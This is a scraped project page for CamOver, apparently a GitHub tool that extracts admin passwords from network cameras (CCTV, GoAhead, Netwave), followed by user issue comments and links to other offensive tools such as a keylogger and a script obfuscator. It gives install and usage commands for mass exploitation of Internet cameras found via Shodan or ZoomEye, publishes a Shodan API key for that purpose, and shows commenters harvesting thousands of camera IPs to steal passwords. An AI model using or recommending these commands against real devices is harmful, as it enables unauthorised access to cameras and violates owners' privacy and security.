CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

Related tags

Security related resourcesiotcameraexploitcamera-controliot-hackingcamera-hackingentysecwebcam-hackingcamera-exploitation
Overview

CamOver

CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

Features

  • Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.
  • Optimized to exploit multiple cameras at one time from list with threading enabled.
  • Simple CLI and API usage.

Installation

pip3 install git+https://github.com/EntySec/CamOver

Basic usage

To use CamOver just type camover in your terminal.

usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
               [--zoomeye ZOOMEYE] [-p PAGES]

CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.

optional arguments:
  -h, --help            show this help message and exit
  -t, --threads         Use threads for fastest work.
  -o OUTPUT, --output OUTPUT
                        Output result to file.
  -i INPUT, --input INPUT
                        Input file of addresses.
  -a ADDRESS, --address ADDRESS
                        Single address.
  --shodan SHODAN       Shodan API key for exploiting devices over Internet.
  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.
  -p PAGES, --pages PAGES
                        Number of pages you want to get from ZoomEye.

Examples

Exploiting single camera

Let's hack my camera just for fun.

camover -a 192.168.99.100

Exploiting cameras from Internet

Let's try to use Shodan search engine to exploit cameras over Internet, we will use it with -t for fast exploitation.

camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free :)

Exploiting cameras from input file

Let's try to use opened database of cameras with -t for fast exploitation.

camover -t -i cameras.txt -o passwords.txt

NOTE: It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.

API usage

CamOver also has their own Python API that can be invoked by importing CamOver to your code.

from camover import CamOver

Basic functions

There are all CamOver basic functions that can be used to exploit specified camera.

  • exploit(address) - Exploit single camera by given address.

Examples

Exploiting single camera

from camover import CamOver

camover = CamOver()
creds = camover.exploit('192.168.99.100')

print(creds)

Other tools

Comments
  • why creds was none?

    why creds was none?

    Holle! Excuse me.

    Python 3.10.4 (main, Mar 25 2022, 15:08:58) [Clang 12.0.8 (https://android.googlesource.com/toolchain/llvm-project c935d99d7 on linux Type "help", "copyright", "credits" or "license" for more information.

    from camover import CamOver camover = CamOver() creds = camover.exploit('192.168.99.100') print(creds) (None, None) creds = camover.exploit('192.168.10.2') print(creds) (None, None)

    #"192.168.10.2"was my camera address,it was online. why creds was none? thanks, please.

    opened by wr0x00 4
  • No output

    No output

    Not sure what is going on but I got a list of cams and put them inside a txt and ran a command with and without threads and I'm not getting any output file even if I change the outputs name and refresh it doesn't seem to be making the list for some reason. Earlier I ran it for the first time and it got an output with only 1 ip but now i can't even get any output

    camover -t -i test.txt --output newlist.txt

    I run this and I get nothing outputted.

    opened by SinThroughCode 2
  • Confused

    Confused

    I ran my own list of IPs and it returned a result of zero passwords for any of them and so I started trying to use the single brute method on around 30 of them and all said not vulnerable. So i tested it with expcamera and each IP I entered in that list was bruted with zero problem. I'm unsure of what would cause this and I know for a fact this list of 2k ips which is fresh from zoomeye are all mostly vulnerable considering I'm screening the same list on expcam right now and its still getting the passwords fine.

    opened by SinThroughCode 1
  • Directory: : does not exist!

    Directory: : does not exist!

    Why does it prompt that the directory does not exist when I execute the following command? Where to put password.txt in which directory

    :~$ camover --shodan (My API_KEY) -o password.txt [-] Directory: : does not exist!

    opened by ChhR00 1
  • When I install the program, I encounter this problem, how can I solve it?

    When I install the program, I encounter this problem, how can I solve it?

    [email protected]:~# pip3 install git+https://github.com/EntySec/CamOver.git Collecting git+https://github.com/EntySec/CamOver.git Cloning https://github.com/EntySec/CamOver.git to /tmp/pip-req-build-zchrgnp4 Running command git clone -q https://github.com/EntySec/CamOver.git /tmp/pip-req-build-zchrgnp4 fatal: unable to access 'https://github.com/EntySec/CamOver.git/': Could not resolve host: github.com ERROR: Command errored out with exit status 128: git clone -q https://github.com/EntySec/CamOver.git /tmp/pip-req-build-zchrgnp4 Check the logs for full command output.

    opened by ChhR00 1
  • Search Shodan by Country/City

    Search Shodan by Country/City

    Hello!

    Is there any way to search in Shodan by country and/or city?

    In the past, when Entynet Project was alive, I remember editing the source of Entropy to modify the Shodan.query but I can't find a way.

    Any help is welcomed.

    Thanks!

    opened by pispuso 1
  • Failed to Authorize Shodan

    Failed to Authorize Shodan

    Hi,

    When I type this command camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD I get an error [*] Authorizing Shodan by given API key... [-] Failed to authorize Shodan!

    Any ideas ?

    opened by ghost 1
Releases(1.0.0)
Owner
EntySec
EntySec is a group of security professionals and software engineers involved in the development of security tools and services.
EntySec
GitHub Repository http://entysec.netlify.app
LeLeLe: A tool to simplify the application of Lattice attacks.

LeLeLe is a very simple library (300 lines) to help you more easily implement lattice attacks, the library is inspired by Z3Py (python interfa

Mathias Hall-Andersen 4 Dec 14, 2021
Open-source keylogger write in python

Python open-source keylogger Language Python open-source keylogger using pynput module Using Install dependences in archive setup.py or install.sh in

Dio brando 4 Jan 15, 2022
Cloud One Container Security Runtime Events Forwarder

Example on how to query events by a RESTful API, compose CEF event format and send the events to an UDP receiver.

Markus Winkler 3 Feb 10, 2022
Local server for IDA Lumina feature

About POC of an offline server for IDA Lumina feature.

Synacktiv 166 Dec 30, 2022
Cobalt Strike Beacon configuration extractor and parser.

Cobalt Strike Configuration Extractor and Parser Overview Pure Python library and set of scripts to extract and parse configurations (configs) from Co

Stroz Friedberg 102 Dec 18, 2022
Anti Supercookie - Confusing the ISP & Escaping the Supercookie

Confusing the ISP & Escaping the Supercookie

Baris Dincer 2 Nov 22, 2022
Make files with as many random bytes as you want

Lots o' Bytes 🔣 Make files with as many random bytes as you want! Use case Can be used to package malware that is normally small by making the downlo

Addi 1 Jan 13, 2022
Obfuscate your Python scripts better, faster.

⚜️ Berserker ⚜️ An unique Python3 obfuscator using Kyrie Eleison's encryption protocol, written in Python3. 📋 Examples 📋 Unobfuscated: input("Hello

Billy 81 Dec 07, 2022
Proof of concept GnuCash Webinterface

Proof of Concept GnuCash Webinterface This may one day be a something truly great. Milestones [ ] Browse accounts and view transactions [ ] Record sim

Josh 14 Dec 28, 2022
The First Python Compatible Camera Hacking Tool

ZCam Hack webcam using python by sending malicious link. FEATURES : [+] Real-time Camera hacking [+] Python compatible [+] URL Shortener using bitly [

Sanketh J 109 Dec 28, 2022
A Burp Pro extension that adds log4shell checks to Burp Scanner

scan4log4shell A Burp Pro extension that adds log4shell checks to Burp Scanner, written by Daniel Crowley of IBM X-Force Red. Installation To install

X-Force Red 26 Mar 15, 2022
Quickstart resources for the WiFi Nugget, a cat themed WiFi Security platform for beginners.

Quickstart resources for the WiFi Nugget, a cat themed WiFi Security platform for beginners.

HakCat 62 Jan 08, 2023
Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.

GoAhead RCE Exploit Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead ( v3.6.5) if the CGI is enabled and a CGI program is dynamic

Francisco Spínola 2 Dec 12, 2021
KeyKatcher is a keylogger that records keystrokes made on a computer and sends to the E-Mail.

What is a keylogger? A keylogger is a software application or piece of hardware that monitors and records keystrokes made on a computer keyboard. The

Himank_Jain 7 Sep 19, 2022
All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting.🎭

This is A Python & Bash Programming Based Termux-Tool Created By CRACKER911181. This Tool Created For Hacking and Pentesting. If You Use This Tool To Evil Purpose,The Owner Will Never be Responsible

CRACKER911181 1 Jan 10, 2022
This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit relays only.

This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit re

22 Nov 09, 2022
This tool help you to check if your Windows machine has hidden miner.

Hidden Miner Detector This tool help you to check if your Windows machine has hidden miner. Miners track when you open antivirus software or task mana

Николай Борщёв 2 Oct 05, 2022
Program that mathematically generates and validates CPF numbers

✔️ Gerador e Validador de CPF Programa que gera e valida números de CPF Requisitos • Como usar • Capturas de Tela Requisitos Antes de começar, você va

João Victor Vilela dos Santos 1 Nov 07, 2021
OLOP: One-Line & Obfuscated Python

OLOP: One-Line & Obfuscated Python This repository contains useful python modules for one-line and obfuscated python. pip install olop-ShadowLugia650

1 Jan 09, 2022
Grafana-POC(CVE-2021-43798)

Grafana-Poc 此工具请勿用于违法用途。 一、使用方法:python3 grafana_hole.py 在domain.txt中填入ip:port 二、漏洞影响范围 影响版本: Grafana 8.0.0 - 8.3.0 安全版本: Grafana 8.3.1, 8.2.7, 8.1.8,

8 Jan 03, 2023